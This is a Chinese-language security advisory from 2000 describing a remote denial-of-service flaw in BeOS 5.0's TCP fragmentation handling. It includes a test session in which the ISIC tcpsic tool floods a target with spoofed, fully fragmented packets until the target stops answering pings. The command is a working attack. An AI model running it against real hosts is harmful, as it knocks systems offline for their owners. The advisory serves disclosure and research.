BeOS TCP 分段机制导致远程拒绝服务攻击
发布日期:2000-05-19
更新日期:2000-05-19
受影响系统:BeOS 5.0
描述:
Be/OS 5.0在tcp分段处理机制上存在问题,攻击者可以发送特殊格式的ip包,使
Be/OS系统锁死,必须冷启动才能回复系统正常工作。
<* 来源:visi0n <visi0n@aux-tech.org> *>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
[root@localhost isic-0.05]# ping 10.0.1.46
PING 10.0.1.46 (10.0.1.46) from 10.0.3.5 : 56(84) bytes of data.
64 bytes from 10.0.1.46: icmp_seq=0 ttl=255 time=7.3 ms
64 bytes from 10.0.1.46: icmp_seq=1 ttl=255 time=1.8 ms
--- 10.0.1.46 ping statistics ---
2 packets transmitted, 2 packets received, 0% packet loss
round-trip min/avg/max = 1.8/4.5/7.3 ms
[root@localhost isic-0.05]# ./tcpsic -s 1.1.1.1 -d 10.0.1.46 -r 31337 -F100 -V0
-I0 -T0 -u0 -t0
Compiled against Libnet 1.0.1b
Installing Signal Handlers.
Seeding with 31337
No Maximum traffic limiter
Using random source ports.
Using random destination ports.
Bad IP Version = 0% IP Opts Pcnt = 0%
Frag'd Pcnt = 100% Urg Pcnt = 0%
Bad TCP Cksm = 0% TCP Opts Pcnt = 0%
1000 @ 1802.8 pkts/sec and 1174.6 k/s
2000 @ 1636.8 pkts/sec and 1105.5 k/s
3000 @ 2110.2 pkts/sec and 1396.4 k/s
4000 @ 1689.1 pkts/sec and 1105.4 k/s
Caught signal 2
Used random seed 31337
Wrote 5002 packets in 2.74s @ 1824.48 pkts/s
[root@localhost isic-0.05]# ping 10.0.1.46
PING 10.0.1.46 (10.0.1.46) from 10.0.3.5 : 56(84) bytes of data.
--- 10.0.1.46 ping statistics ---
11 packets transmitted, 0 packets received, 100% packet loss
[root@localhost isic-0.05]#
建议:
暂无
浏览次数:6165
严重程度:0(网友投票)
